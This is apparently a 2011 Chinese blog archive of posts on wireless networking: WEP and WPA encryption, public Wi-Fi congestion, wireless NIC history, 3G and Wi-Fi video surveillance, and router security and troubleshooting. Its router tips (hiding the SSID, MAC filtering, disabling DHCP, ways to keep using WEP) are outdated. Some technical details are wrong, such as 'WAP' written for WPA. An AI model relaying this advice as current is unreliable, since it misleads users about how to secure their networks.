然而,在没有使用NAC的情况下,802.1X可以作为简单交换使用:如果出错您就会无法连接无线LAN;如果成功,您就可以获得您所在用户/群组的对应访问权限(通常是通过RFC 3580 VLAN标签实现)。但是,如果与NAC一起使用时,802.1X就可以根据用户/群组的身份和设备安全状态来执行策略决定。虽然NAC可以在没有802.1X的情况下执行,但是这二种技术一起使用就可以实现更强大的企业无线LAN访问控制。
Wireless N.T | Tags: , | 0 , 1173 Ķ
May
10
2011
无线网络的安全尽管从名字上看似乎是一个针对有线网络的安全选项,其实并不是这样。WEP标准在无线网络的早期已经创建,目标是成为无线局域网WLAN的必要的安全防护层,但是WEP的表现无疑令人非常失望。它的根源在于设计上存在缺陷。

在使用WEP的系统中,在无线网络中传输的数据是使用一个随机产生的密钥来加密的。但是,WEP用来产生这些密钥的方法很快就被发现具有可预测性,这样对于潜在的入侵者来说,就可以很容易的截取和破解这些密钥。即使是一个中等技术水平的无线黑客也可以在两到三分钟内迅速的破解WEP加密。

IEEE 802.11的动态有线等效保密(WEP)模式是二十世纪九十年代后期设计的,当时功能强大的无线网络加密作为有效的武器受到美国严格的出口限制。由于害怕强大的加密算法被破解,无线网络产品是被被禁止出口的。然而,仅仅两年以后,动态有线等效保密模式就被发现存在严重的缺点。但是二十世纪九十年代的错误不应该被当着无线网络安全或者IEEE 802.11标准本身,无线网络产业不能等待电气电子工程师协会修订标准,因此他们推出了临时密钥完整性协议TKIP(动态有线等效保密的补丁版本)。

尽管WEP已经被证明是过时且低效的,但是今天在许多现代的无线访问点和路由器中,它依然被支持。不仅如此,它依然是被个人或公司所使用的最多的加密方法之一。如果你正在使用WEP无线网络加密,如果你对你的网络的安全性非常重视的话,那么以后尽可能的不要再使用WEP,因为那真的不是很安全。

无线网络最初采用的安全机制是WEP(有线等效私密),但是后来发现WEP是很不安全的,802.11组织开始着手制定新的安全标准,也就是后来的802.11i协议。但是标准的制定到最后的发布需要较长的时间,而且考虑到消费者不会因为为了网络的安全性而放弃原来的无线设备,因此Wi-Fi联盟在标准推出之前,在 802.11i草案的基础上,制定了一种称为WPA(Wi-Fi Procted Access)的安全机制,它使用TKIP(临时密钥完整性协议),它使用的加密算法还是WEP中使用的加密算法RC4,所以不需要修改原来无线设备的硬件,WPA针对WEP中存在的问题:IV过短、密钥管理过于简单、对消息完整性没有有效的保护,通过软件升级的方法提高网络的安全性。

WPA的出现给用户提供了一个完整的认证机制,AP根据用户的认证结果决定是否允许其接入无线网络中;认证成功后可以根据多种方式(传输数据包的多少、用户接入网络的时间等)动态地改变每个接入用户的加密密钥。另外,对用户在无线中传输的数据包进行MIC编码,确保用户数据不会被其他用户更改。作为802.11i标准的子集,WPA的核心就是IEEE802.1x和TKIP(Temporal Key Integrity Protocol)。

WPA考虑到不同的用户和不同的应用安全需要,例如:企业用户需要很高的安全保护(企业级),否则可能会泄露非常重要的商业机密;而家庭用户往往只是使用网络来浏览 Internet、收发E-mail、打印和共享文件,这些用户对安全的要求相对较低。为了满足不同安全要求用户的需要,WPA中规定了两种应用模式:企业模式,家庭模式(包括小型办公室)。

根据这两种不同的应用模式,WPA的认证也分别有两种不同的方式。对于大型企业的应用,常采用“802.1x+ EAP”的方式,用户提供认证所需的凭证。但对于一些中小型的企业网络或者家庭用户,WPA也提供一种简化的模式,它不需要专门的认证服务器。这种模式叫做“WPA预共享密钥(WPA-PSK)”,它仅要求在每个WLAN节点(AP、无线路由器、网卡等)预先输入一个密钥即可实现。

这个密钥仅仅用于认证过程,而不用于传输数据的一种无线网络加密。数据加密的密钥是在认证成功后动态生成,系统将保证“一户一密”,不存在像WEP那样全网共享一个加密密钥的情形,因此大大地提高了系统的安全性。
Wireless N.T | Tags: | 0 , 1144 Ķ
Apr
18
2011
  
  当用户通过公共Wi-Fi热点进行上网冲浪时,如果遇到网络拥堵,那么可以归咎于以下几个原因:网络的安装和带宽供给成本,以及接入Web的设备数量。
  Springboard Research 研究机构网络连接部门副总经理Bryan Wang认为,设计公共Wi-Fi热点时所面对的挑战,与其说是技术问题,倒不如说是网络利用率和成本的问题。
  虽然在网络高峰时期,可以通过增加热点的方式减轻Wi-Fi网络拥堵情况,但当网络接入进入低谷时段后,网络设备的利用率就会大大下降。
  虽然多出来的热点可以通过关闭设备来减少,但是从商业的角度说,企业提供公共热点服务还需要考虑到带宽和网络维护成本。
  Cisco Systems新加坡分公司部门经理J. Ramesh Babu表示,公共Wi-Fi网络拥塞的另一个原因是设备老化,或使用了其它部门淘汰下来的设备,这在目前的商业环境下很常见。他说,使用老旧的客户端设备会降低整个网络的性能,尤其是在大量使用富媒体数据的时候。
  他还补充说,在设计和部署公众或户外WiFi网络时所面临的挑战可以通过正确的网络配置和工具,以及恰当的部署计划来解决。比如,他建议场馆的经营者在考虑部署WiFi网络时采用支持范围更广的设备,比如能够支持蜂窝和WiFi的双模IP电话,笔记本和智能手机等。
  另外,他提醒经营者,无线网络的覆盖范围会受到建筑环境的影响,比如墙体,隔断以及电梯间等。另外,无线网络还可能受到无绳电话、蓝牙或其它无线设备的干扰。
  WiFi服务提供商可以利用工具解决这一问题,他们通过检测和自动调整射频的方式让WiFi网络能够在对应的环境下正常工作。
  消费者渴望 Wi-Fi接入
  Babu 表示,随着越来越多的企业实行移动办公,能够随时随地接入到WiFi网络已经成了企业员工,企业合伙人,以及消费者的“逻辑期望”,甚至有些企业希望公司资产都能随时上网。
  Ovum资深顾问 Craig Skinner对此表示赞同。他认为,随舍移动设备,比如智能手机以及掌上电脑的普及,对WiFi接入的需求将不断增加。
  他还表示,公共 Wi-Fi 网络如果用来完成这种工作,将从智能手机,平板电脑甚至笔记本那里承担相当高密度的流量。在重申了Wang的观点后,Skinner表示,问题仍然回到建造这种网络的成本以及覆盖范围上。
  在一次邮件采访中,他明确表示,让一个由公共基金维护的户外WiFi网络具有像科技会议会场中的WiFi网络一样的性能,是不现实的想法。
  他解释说,大多数时候,公共Wifi接入所提供的免费服务只是用来吸引消费者到这里消费或吸引企业来这个场所举办活动。但是归根到底,网络架构的部署费用和运营成本还是必须支付。
  而由于消费者并不需要直接承担这部分费用,因此场所的经营者们也就没有足够的热情去投入更多经费建立高质量的网络服务,尤其是在那些网络流量高峰很少出现的场所更是如此。
  另外,Skinner还表示,接入设备的天线装置也是影响接入质量的因素之一。他解释说,天线的尺寸和它的功率会影响网络的覆盖范围以及网络的连接稳定性。因此,如果手机这样的小设备总是感觉网络拥堵,难以接入,那么有可能是因为网络设备的天线问题,而不是管理者有意将这些用户踢下网。
  Springboard 的wang认为,就算WiFi服务能够像消费者期望的那样更广泛,甚至能够在飞机上使用,WiFi也不能算是最优的移动性解决方案。他说:“WiFi热点之间并不能快速切换,因为与3G或WiMax相比,WiFi网络的覆盖范围太小,如果我们采用WiFi作为移动宽带接入解决方案,那么用户的设备在运动中就会产生大量切换数据,从而浪费网络资源。因此,WiFi并不适合用于城际移动解决方案。”
Wireless N.T | Tags: , | 0 , 1052 Ķ
Apr
14
2011
无线网卡的分类与使用
无线网卡究竟是什么?也许对于初识者来说,还不清楚,先让我们来看一下无线网卡的介绍吧。

无线网卡的起源

一说到无线网卡的历史起源,就不能不提到无线局域网的的历史。无线局域网的的起源可以追溯到二十世纪四十年代的第二次世界大战期间,当时美国陆军就采用了无线电信号做资料的传输,他们研发出了一套无线电传输技术,并且采用非常高的加密技术。 后来,这项技术就在美军和盟军中间广泛使用了;这让一些学者对此产生了兴趣并从中得到了灵感。

1971年,夏威夷大学(University of Hawaii)的研究人员创造了第一个基于封包式技术的无线电通讯网络,被称为ALOHNET网络,是最早的无线局域网(wireless local area network,WLAN)。这个WLAN包括了7台计算机,采用双向星型拓扑(bi-directional star topology)横跨四座夏威夷的岛屿,中心计算机放置在瓦胡岛(Oahu Island)上。从这时起,无线局域网可以说是正式诞生了。

虽然从有限的资料中我们无法找到有关无线网卡的只言片语,但我们可以肯定的是其中必定出现了今天无线网卡的始祖。如果从1971年世界上第一个无线网络实验成功开始计算,那么到现在为止无线网卡的历史也就短短的35年。事实上,无线局域网的大规模发展是在20世纪90年代。

1997年IEEE(The Institute of Electrical and Electronics Engineers)提出并制定了最早的无线标准IEEE 802.11;在1999年9月又提出了IEEE 802.11a标准和IEEE 802.11b标准。

随着IEEE802.11a、IEEE802.11b标准的出台以及Wi-Fi组织的成立促进了无线局域网产品的兼容化、标准化以及市场化。从此以后,无线局域网随着电脑的普及得到了人们越来越多的关注。 无线网卡实际上是一种终端无线网络设备,它是需要在无线局域网的无线覆盖下通过无线连接网络进行上网使用的。换句话说无线网卡就是使你的电脑可以利用无线来上网的一个装置,但是有了无线网卡也还需要一个可以连接的无线网络,因此就需要配合无线路由器或者无线AP使用,就可以通过无线网卡以无线的方式连接无线网络可上网。

无线网卡的作用、功能跟普通电脑网卡一样,是用来连接到局域网上的。它只是一个信号收发的设备,只有在找到上互联网的出口时才能实现与互联网的连接,所有无线网卡只能局限在已布有无线局域网的范围内。无线网卡就是不通过有线连接,采用无线信号进行连接的网卡。

无线网卡可以根据不同的接口类型来区分,第一种是USB无线上网卡,是目前最常见的;第二种是台式机专用的PCI接口无线网卡;第三种是笔记本电脑专用的PCMCIA接口无线网卡;第四种是笔记本电脑内置的MINI-PCI无线网卡。

就如上面所说,我们光有无线网卡是无法连接无线网络,还必须有无线路由器或无线AP。无线网卡就好比是接收器,无线路由相当于发射器。其实还是需要有线的Internet线路接入到无线猫上,再将信号转化为无线的信号发射出去,由无线网卡接收。一般的无线路由器可以拖2-4个无线网卡,工作距离在50米以内效果较好,远了通信质量很差。

无线网卡主流的标准是IEEE 802.11n,它大幅提升无线局域网竞争力,无线局域网标准、技术快速发展,产品逐渐成熟,无线局域网的应用也日益丰富。越来越多的家庭用户开始使用无线网络,许多企业也纷纷在自己的办公大楼内布设无线局域网,同时,电信运营商对无线局域网也给予了极大关注,现在无论是在机场、酒店、咖啡厅等公共区域铺设公众无线网络,给大家提供方便的无线上网。

Wireless N.T | Tags: , | 0 , 1049 Ķ
Apr
6
2011
    3G无线监控
  严格来说,分为2G和3G二种方式;一种是早前的2G模试,另一种是最新版的3G模试。
  1、2G无线监控传输方式主要包括CDMA、GSM两种模式。此两种模式硬件成本较低,覆盖面大,传输速度慢,理论值传输速率最高为153.6Kbps,在实际使用中基本只达到60~80Kbps。因为视频图像最底要求512Kbps才能流畅传输,此速度远远达不到视频要求。因此在无线监控项目中,很少有厂商去选用。另外一个最大的缺点是运营商收取的流量费太高,每个月,每年,都会产生大笔的费用。一般只有在很偏远,WIFI无线设备做不到的情况下,并有一定资金时才会考虑。
  2、3G无线监控是采用移动(TD-SCDMA)、电信(CDMA2000 EVDO)、联通(WCDMA)运营商的3G技术接入方式,自09年起,经各运营商大力推广,已有不少监控厂家针对此方面研发相关的产品。而3G突出的优点即高速的下载能力,理想值可达到3Kbps~20Mbps的传输速率,但目前因其仍处于推广阶段,因此在传输速率这方面还有待进一步考证。
  3G目前存在无线带宽容量有限、接入用户有限、时延长等缺陷,在多用户共享的情况下,难以保证无线视频监控的速率和时延要求,主要缺点还是运营商收取的流量费太高,一般客户无法接受。
  WIFI式无线监控
  严格来说,WIFI式无线监控又分为二种方式;一种是模拟无线监控;另一种是数字无线监控。
  1、模拟无线监控就是将视频信号直接调制在2.4G或1G的无线通道上,通过天线发射出去,监控中心通过天线接收无线信号,再通过无线接收机解调出原来的视频信号,这种监控方式没有压缩损耗,几乎不会产生延时,因此可以保证视频质量,但其只适合点对点近距离(1KM以内)单路传输,不适合规模部署。
  此外因为没有调制校准过程,抗干扰性差,频点少,所以在无线信号环境复杂的情况下自身会产生很大干扰性,造成图像混乱,丢失等情况。因此在有多路图像要传输的情况下,不建议用此方式传输。
  2、数字无线监控就是先将视频信号编码压缩,通过数字无线信道调制(2.3G/2.4G/5.8G等),再利用天线发射出去。接收端则相反,由天线接收信号,随后无线解扩及视频解压缩,最后还原为模拟的视频信号传输出去,此种方式也是目前国内市场较多使用的。数字微波的伸缩性大,通信容量最少可用几十个频道,且建构相对较易,通信效率较高,运用灵活。
  数字无线有模拟无线不可比的优点,如大面积(5-30平方公里)、监控点位多(5-500个点)需要加中继的情况多、情况复杂且干扰源多时采用LP5800-WBS  WIFI基站为中心再配合基站前端CPE设备方式传输性价比非常高。数字无线容量大、抗干扰能力强、保密性好,同样的发射功率传输距离更远,受地形或障碍物影响较小,接口丰富,扩展能力强等。
  当然,不同的无线传输技术都有其各自适用的场所。如在工厂、油田、边防、森林等,采用WIFI的无线监控较多,随着3G各方面性能的提升、流量费用的下降、网络环境的成熟,以及大范围无线监控的普遍需求,也会促使3G的进一步使用。  
Apr
2
2011
解析无线设备的安全性
  无线路由器、AP及无线网卡为代表的无线网络产品,已经逐渐打破家庭和中小企业市场中Hub以及普通路由器“一统天下”的局面,成为构建SOHO和中小型网络的首选。市场需求巨大、价格的敏感、同类产品竞争的激烈,都要求无线产品生产厂商必须想尽一切办法压低成本,而一些中小企业为了降低成本更是“饥不择食”。一些假冒伪劣产品的出现给消费者带来的的困扰和问题如下:
  死机
  恐怕现在无线产品消费者反映最强烈的问题就是无线产品突然停止工作、死机。特别是在新手第一次使用无线路由器的时候,这个问题更常见,一般的原因就是配置出现问题,在反复选择恰当的选项后一般都能解决。但有的用户反映,无线产品总是隔三差五出现死机,而无线产品的售后服务人员也没有什么好办法来解决,无非是再三告诉用户将软件版本升级到最新,或者干脆说硬件设计存在问题。
  有效距离短
  这个问题已经见怪不怪了,一般无线产品的实际有效距离能够达到其宣称的最大距离的1/3~1/2就算不错了。这个问题的出现有诸多方面的因素,例如无线天线的有效性、无线产品的位置、无线产品间的障碍物、无线产品的散热效果等,这些都会成为无线产品厂家推脱其产品质量的借口。在这种情况下,要达到增加传输距离的目的,可以采取重新选择合理的位置布放无线天线、为无线产品增加增益天线等方式。如果感兴趣,还可以自己动手做一个简单的增益天线,说不定增益效果能让你十分满意。
  频频断线
  很多朋友在使用无线产品的时候,经常会发现无线信号忽强忽弱、忽断忽续,除了环境影响和电磁波的干扰因素外,主要是由无线产品本身的稳定性和质量原因造成的。比如在使用无线路由器时,虽然网络连接仍然“健在”,但是已经无法访问到互联网,而重新启动路由器后,就可以恢复正常,这种情况就是典型的无线产品的不稳定造成的。
  拨打厂家的售后服务电话进行询问,很可能得到两种答案,一种是说与之配合的无线网卡兼容性有问题,一种是说升级一下软件版本,实在解释不通时,就说这是个特殊情况,总之承认自身产品有问题的厂商几乎没有。
  无线产品的选择还希望大家在购买时多留意,不要图一点微薄的利益给自己带来更大的麻烦。
  无线设备带来的问题如下:
  兼容性差
  我们常常会遇到这样的情况,无线产品的说明书中清楚地告诉消费者,其产品兼容某某技术的产品,但是在实际使用中却并非如此。无线安全兼容性差主要表现在一个厂商生产的无线路由器或无线AP与另外的厂商生产的无线网卡连接工作时不兼容。
  产生不兼容的原因是,不同厂家使用的芯片等硬件和使用的技术有区别,或者是早期的产品跟应用新技术的新产品之间的兼容性不好,例如一些无线产品是在迅驰技术出现之前就设计完成的,在设计时根本就没有考虑到迅驰会如此普遍使用,从而导致对迅驰的兼容性不好。兼容性问题将直接导致无线产品之间无法连接,或者连接速度较差。
  抗干扰性差
  随着日常使用的电子产品的逐渐增多,与无线产品使用相同频段的产品也越来越多,这极大地影响了无线路由器与无线网卡之间数据传输的速率,这就对无线产品的抗干扰性提出了更高的要求。
  干扰主要来自两个方面,首先是来自附近同频段无线设备的干扰,随着无线市场的发展与无线产品的使用密度不断增大,该问题在公司、写字楼、商业区、住宅区都极易发生。
  另外,其他一些干扰源也会对无线路由器的天线收发效果有较大影响,例如无绳电话(2.4或5.xGHz)、蓝牙设备(2.4GHz)、脉冲雷达 (5.4GHz)、微波炉(在2.4GHz频宽中50%的忙闲度将产生脉冲干扰)、低能量RF光源(2.4GHz)等。一些无线产品为了降低制造成本,抗干扰性设计和屏蔽金属材料都比较差,导致无线产品抗干扰性差或者根本没有抗干扰性。
  散热性差
  无论是无线路由器还是无线网卡,其芯片和各种器件都是工作在一定工作环境下的,例如温度有一定的范围,如果温度太高将直接导致工作效率的下降,甚至导致无线产品的损坏。无线产品工作时必然会产生一定的热量,所以能否及时散热是无线产品质量检验的重要指标,这与无线产品的设计结构、工作功率、散热特点、散热材料等密切相关。
  有的无线产品因为片面追求美观和低成本,而大量采用散热效果不好的材料和结构,这都会导致无线产品长时间工作过热,从而影响连接速度,甚至损坏硬件。
  无线网卡的工作并不是只要能在PC上正常安装即可,要充分考虑与无线路由器或AP的兼容性和配合性,否则会影响无线传输距离和工作效率,所以在购买时不要仅仅试验在笔记本电脑中能否正常安装使用,而关键要看能否与无线设备配合好。
Apr
2
2011
无线路由器安全设置技巧
  无线路由器安全设置:DHCP—自动获取IP,还是固定IP?
  DHCP(Dynamic Host Configuration Protocol)动态主机设定协议的功能就是可在局域网内自动为每台电脑分配 IP地址,不需要用户设置IP地址、子网掩码以及其他所需要的TCP/IP参数。它分为两个部份:一个是服务器端(在 这里指的是具有DHCP服务功能的无线AP或无线路由器),而另一个是客户端(用户的个人电脑等无线客户端设备)。 所有的IP网路设定资料都由DHCP服务器集中管理,并负责处理客户端的DHCP要求;而客户端则会使用从DHCP服务器分配下来的IP环境资料。
  如果无线AP或无线路由器启用了DHCP功能,为接入无线网络的主机提供动态IP,那么别人就能很容易使用你的 无线网络。因此,禁用DHCP功能对个人或企业无线网络而言很有必要,除非在机场、酒吧等公共无线“热点”地区 ,则应打开DHCP功能。一般在无线路由器的“DHCP服务器”设置项下将DHCP服务器设定为“不启用”即可。这样既 使能找到该无线网络信号,仍然不能使用网络。我们给出的建议是:采用不是很常用私有网段的静态方式,最好不要用192.168.0.0-192.168.0.255这个常用私有网段,让人一猜就中。
  无线路由器安全设置:这里提示大家如何让WEP更安全
  (1)使用多组WEP密钥,使用一组固定WEP密钥,将会非常不安全,使用多组WEP密钥会提高安全性,但是请注意 WEP密钥是保存在Flash中,所以某些黑客取得您的网络上的任何一个设备,就可以进入您的网络;
  (2)如果你使用的是旧型的路由器,且只支持WEP,你可以使用128位的WEP Key,这样会让你的无线网络更安全 。
  (3)定期更换你的WEP密钥。
  (4)你可以去制造商的网站下载一个固件升级,升级后就能添加WPA支持。
  WPA(Wi-Fi保护接入)能够解决WEP所不能解决的安全问题。简单来说,WEP的安全性不高的问题来源于网络上各 台设备共享使用一个密钥。该密钥存在不安全因素,其调度算法上的弱点让恶意黑客能相对容易地拦截并破坏WEP 密码,进而访问到局域网的内部资源。
  WPA是继承了WEP基本原理而又解决了WEP缺点的一种新技术。由于加强了生成加密密钥的算法,因此即便收集到分组信息并对其进行解析,也几乎无法计算出通用密钥。其原理为根据通用密钥,配合表示电脑MAC地址和分组信 息顺序号的编号,分别为每个分组信息生成不同的密钥。然后与WEP一样将此密钥用于RC4加密处理。
  通过这种处理,所有客户端的所有分组信息所交换的数据将由各不相同的密钥加密而成。无论收集到多少这样的数据,要想破解出原始的通用密钥几乎是不可能的。WPA还追加了防止数据中途被篡改的功能和认证功能。由于 具备这些功能,WEP中此前倍受指责的缺点得以全部解决。WPA不仅是一种比WEP更为强大的加密方法,而且有更为 丰富的内涵。作为802.11i标准的子集,WPA包含了认证、加密和数据完整性校验三个组成部分,是一个完整的安全性方案。
  无线路由器或AP在出厂时,数据传输加密功能是关闭的,如果你拿来就用而不作进一 步设置的话,那么你的无线网络就成为了一个“不设防”的摆设,这是大家需要注意的。我们给出的建议是:采用WPA加密方式。
  无线路由器安全设置:WEP、WPA—WEP加密,还是WPA加密
  无线网络加密是通过对无线电波里的数据加密提供安全性,主要用于无线局域网中链路层信息数据的保密。现在大多数的无线设备具有WEP加密和WAP加密功能,那么我们使用WEP加密,还是WAP加密呢?显然WEP出现得比WAP早 ,WAP比WEP安全性更好一些。
  WEP采用对称加密机制,数据的加密和解密采用相同的密钥和加密算法。启用加密后,两个无线网络设备要进行通信,必须均配置为使用加密,具有相同的密钥和算法。WEP支持 64 位和128 位加密,对于 64 位加密,密钥为 10 个十六进制字符(0-9 和 A-F)或 5 个 ASCII 字符;对于 128 位加密,密钥为 26 个十六进制字符或 13 个 ASCII 字符。
  无线路由器安全设置:MAC地址—网络世界的DNA
  由于每个无线网卡都有世界上唯一的物理地址MAC,因此可以在无线AP(或无线路由器)中手工设置一组允许访问的主机的无线网卡MAC地址列表,实现物理地址过滤。这要求我们必需随时更新AP 中的MAC地址列表。
  设置MAC地址过滤对于大型无线网络来说工作量太大,但对于小型无线网络则不然,因此我们应不怕麻烦。MAC 地址在理论上是可以伪造,因此它是较低级别的认证方式。我们给出的建议是:对于家庭及小型办公无线网络,用户不是很多,应该设置MAC地址过滤功能。
  无线路由器安全设置:SSID—隐藏自己
  无线路由器一般都会提供“允许SSID广播”功能。如果你不想让自己的无线网络被别人的无线网卡“轻易”搜 索到,那么最好“禁止SSID广播”。SSID通俗地说便是给无线网络所取的名字,它的作用是区分不同的无线网络。
  SSID是无线网卡发现无线网络的第一要素,开启广播SSID以后,在无线网络的效覆盖范围内,无线网卡会自动 找到该网络,并尝试与之连接。若我们不愿将自己的无线网络曝露在大庭广众之内,我们应想到隐藏自己无无线网络的SSID,应把“广播SSID”这项功能关闭。“广播 SSID”关闭以后,无线网卡不会自动找到无线网络,到接入 到这个无线网络需要手动添加SSID。我们给出的建议是:隐藏SSID。
  无线路由器安全设置:如何让无线网络更安全
  据互联网的资料,使用以下软件:Network Stumbler、WildPackets AiroPeek NX 、OmniPeek 4.1和 WinAircrack等,这些软件只要有足够长的时间来抓取正在通信中的无线网络通信信号,就可以破解包括WEP加密、 WPA加密、MAC过滤、SSID隐藏等无线网络安全设置。
  这听起来不免令我们失望,那么如何让无线网络更安全。确保尽可能的让无线接入网络不要依赖于WEP等技术而尽可能的采取其他更为安全手段,目前实现这个目标的方法主要有VPN技术,如:使用安全协议如点对点隧道协议 (PPTP)或者第二层隧道协议(L2TP),使用IPSec,SSL 等VPN技术。这样既可以获得访问控制功能,也可以获得端到端(程序至程序)的加密功能。
Mar
28
2011
无线局域网故障修复  
  无线局域网(小型)在过去,是用于收发电子邮件和浏览网页的,无线局域网通常是由射频专家用的手动工具来排除网络故障的。但是随着数据流量大小和差异性日益显著,再加之无线局域网已经成为了网络接入的主要手段之一,无线局域网故障修复手段也得到了快速的成长。
  WLAN管理工具如何提高WLAN故障修复的能力
  随着802.11被越来越多地应用于各种消费性电子产品当中,如笔记本电脑、小型上网本、智能手机、打印机、摄像机等,用户在不同地方接入至网络的性能会因为设备不同而有所不同。为了达到最佳效果,咨询台必须对历史性数据和实时数据都有高度的洞察力。
  这也正是当今WLAN管理工具当道的一个重要原因。例如,Meraki's 云计算控制器可显示每一个连接的客户端的近乎于实时的状态数据。除此之外,它还可以提供一些基本的功能(如,已连接AP的识别,在AP上Ping客户端,以及监测输入或输出计数器等)。该控制器的用法对咨询台来说相当简单,并且只需要在web上查看相关内容对他们来说方便了许多。
  然而,随着网络的复杂程度日趋显著,相应的故障排除难度也在增加。当前,客户端可自由快速地在若干个AP之间漫游;有一些办公场所很可能会用多种不同品牌不同型号的AP进行连接,优秀的第三方WLAN管理通常也是比较有保障的。比如 Aruba的AirWave Management Platform就能显示多个供应商的AP,并根据客户端的职位特征进行调整,如咨询台,网络运营中心,或工程师们。对于每个连接都会有实时的监测和映射,并会记录下来以便进行趋势分析。其目的就是快速辨别故障的来源,是用户错误、客户端配置、网络中断、信号较弱,还是信号堵塞问题。与于Aruba的AirWave类似的监测工具,能解决大多数的第一层网络问题,如果出现其他问题则就需要申报至更高级别的工程师(第二层或第三层)。
  使用分布式传感平台进行能动的WLAN测试
  当然,最重要的就是要在故障还没有影响到用户体验之前,就识别、侦测并排除掉。正是由于这个原因,企业通常会运行自动化网络诊断测试——定期地连接至关键服务器和应用程序以快速识别NOC故障。
  然而,在WLAN中进行网络担保是比较困难的,因为WLAN中的用户移动频率都比较高。要知道AP可达并不等同于验证了这个来自不同地域,使用不同SSID或频段的无线客户端可连接至该AP。对于后者,可以考虑类似于Motorola AirDefense Network Assurance Suite 或 7signal Sapphire的工具。
  这些工具都使用了远距离配置Wi-Fi传感器来创建分布式测试平台。例如,AirDefense套件就是无线入侵防御系统(WIPS) 的扩展,它可以定期连接至附近的AP,就像“真实”的客户端。一旦连接后,这些传感器的客户端就可以运行网络担保测试,提前对NOC作出告警,并提供诊断数据(例如,远程数据包捕获,或其他关键指标)。
  使用基于AP的频谱分析仪对信号质量进行监测
  在WLAN中,由用户错误,客户端配置或上行网络/应用程序崩溃造成的故障是不能“自动复原”的。然而,有时候由信号覆盖较弱,或RF干扰导致的故障,却可以通过AP和控制器完成自我恢复。
  几乎所有的AP都具有匹配最佳通道的特性。对于有些控制器来说,管理员可以立即释放一些通道,或者设置多长时间进行再一次检测。无线资源管理的算法千变万化,但是通常需要考虑的就是这些每条通道上的AP以及它们的信号强度。在5GHz DFS通道中,其他的信号传送器(譬如雷达系统)也需要考虑在内的。
  但是由非802.11干扰引起的问题还是比较难诊断或避免的。当遇到这类故障时,传统的做法是,使用手持式信号分析仪进行抽样,这种方法有着一定的局限性。分散的干扰可能在抽样时没有传输。在嘈杂的高密集度的地方,光谱图很难形象地说明具体情况。到抽样值说明清楚后,解决方案可以又要改变了。
  为了克服这些局限性,几家供应商,包括Aruba、Cisco、Meraki以及Motorola,现今都开始提供基于AP的频谱分析仪。虽然这些分析仪的性能各异,但是此类的工具都使用了AP去监听非802.11干扰。甚至还有几款产品应用了数字签名来识别干扰(如摄像机、电话等)。例如,Cisco的Clean Air 就可以定期地设定Aironet 3500 AP至监测模式,来分析2.4和5GHz干扰,并可以根据实际情况重新分配通道,避免802.11和非802.11干扰。
  无线局域网再被企业组件式时,经常会遇到一些网络故障,像无线信号不稳定、可以搜索到信号无法动态获取ip地址、经常出现瞬间断开又连上等这样的现象是经常发生的,那么,以上的无线局域网故障修复措施就是很好的解救办法。
Mar
24
2011
  无线网络技术已经深入人心,那么我们该如何进行设置,并且在设置的时候我们应该注意哪些问题呢,这里就给我们详细的介绍一下。
  组建家庭Infrastructure无线网络,无线网卡的设置和Ad-hoc网络大同小异,主要应注意以下几点。
  无线网卡设置(1):如果设置了无线路由器DHCP服务器为动态分配IP,那么就不要为无线网卡在TCP/IP协议中指定IP地址,以免画蛇添足。DHCP服务器会为无线网卡自动分配IP地址。如果无线网卡和新加入的无线系统的无线路由器DHCP服务器的IP地址不“同步”,可重新启动无线客户端电脑便可。
  无线网卡设置(2):可根据无线网卡上的指示灯或Windows桌面右下角工具栏中的无线网卡图标判断无线网卡是否已和无线路由器正常连通。一般来说,显示红色表明无线网络没有联通,如显示绿色则表明已搜索到无线网络并正常联通。
  无线网卡设置(3):在Windows桌面右下角工具栏中的无线网卡图标中可对无线网卡的主要参数进行设置。在“Network Mode(网络模式)”选项中应选择为“Infrastructure”模式,也就是无线网卡与无线AP相连的模式。
  在“SSID”相关选项中如果无线路由器设置了广播模式,可选为“ANY(First Available Access Point)”自动侦测模式即可。如果没有广播SSID,则填入您在无线路由器中自行设置的SSID名称即可。
Mar
24
2011
无线网络基础无线网卡的分类与使用 
  无线网卡究竟是什么?也许对于初识者来说,还不清楚,先让我们来看一下无线网卡的介绍吧。
  无线网卡的起源
  一说到无线网卡的历史起源,就不能不提到无线局域网的的历史。无线局域网的的起源可以追溯到二十世纪四十年代的第二次世界大战期间,当时美国陆军就采用了无线电信号做资料的传输,他们研发出了一套无线电传输技术,并且采用非常高的加密技术。 后来,这项技术就在美军和盟军中间广泛使用了;这让一些学者对此产生了兴趣并从中得到了灵感。
  1971年,夏威夷大学(University of Hawaii)的研究人员创造了第一个基于封包式技术的无线电通讯网络,被称为ALOHNET网络,是最早的无线局域网(wireless local area network,WLAN)。这个WLAN包括了7台计算机,采用双向星型拓扑(bi-directional star topology)横跨四座夏威夷的岛屿,中心计算机放置在瓦胡岛(Oahu Island)上。从这时起,无线局域网可以说是正式诞生了。
  虽然从有限的资料中我们无法找到有关无线网卡的只言片语,但我们可以肯定的是其中必定出现了今天无线网卡的始祖。如果从1971年世界上第一个无线网络实验成功开始计算,那么到现在为止无线网卡的历史也就短短的35年。事实上,无线局域网的大规模发展是在20世纪90年代。
  1997年IEEE(The Institute of Electrical and Electronics Engineers)提出并制定了最早的无线标准IEEE 802.11;在1999年9月又提出了IEEE 802.11a标准和IEEE 802.11b标准。
  随着IEEE802.11a、IEEE802.11b标准的出台以及Wi-Fi组织的成立促进了无线局域网产品的兼容化、标准化以及市场化。从此以后,无线局域网随着电脑的普及得到了人们越来越多的关注。 无线网卡实际上是一种终端无线网络设备,它是需要在无线局域网的无线覆盖下通过无线连接网络进行上网使用的。换句话说无线网卡就是使你的电脑可以利用无线来上网的一个装置,但是有了无线网卡也还需要一个可以连接的无线网络,因此就需要配合无线路由器或者无线AP使用,就可以通过无线网卡以无线的方式连接无线网络可上网。
  无线网卡的作用、功能跟普通电脑网卡一样,是用来连接到局域网上的。它只是一个信号收发的设备,只有在找到上互联网的出口时才能实现与互联网的连接,所有无线网卡只能局限在已布有无线局域网的范围内。无线网卡就是不通过有线连接,采用无线信号进行连接的网卡。
  无线网卡可以根据不同的接口类型来区分,第一种是USB无线上网卡,是目前最常见的;第二种是台式机专用的PCI接口无线网卡;第三种是笔记本电脑专用的PCMCIA接口无线网卡;第四种是笔记本电脑内置的MINI-PCI无线网卡。
  就如上面所说,我们光有无线网卡是无法连接无线网络,还必须有无线路由器或无线AP。无线网卡就好比是接收器,无线路由相当于发射器。其实还是需要有线的Internet线路接入到无线猫上,再将信号转化为无线的信号发射出去,由无线网卡接收。一般的无线路由器可以拖2-4个无线网卡,工作距离在50米以内效果较好,远了通信质量很差。
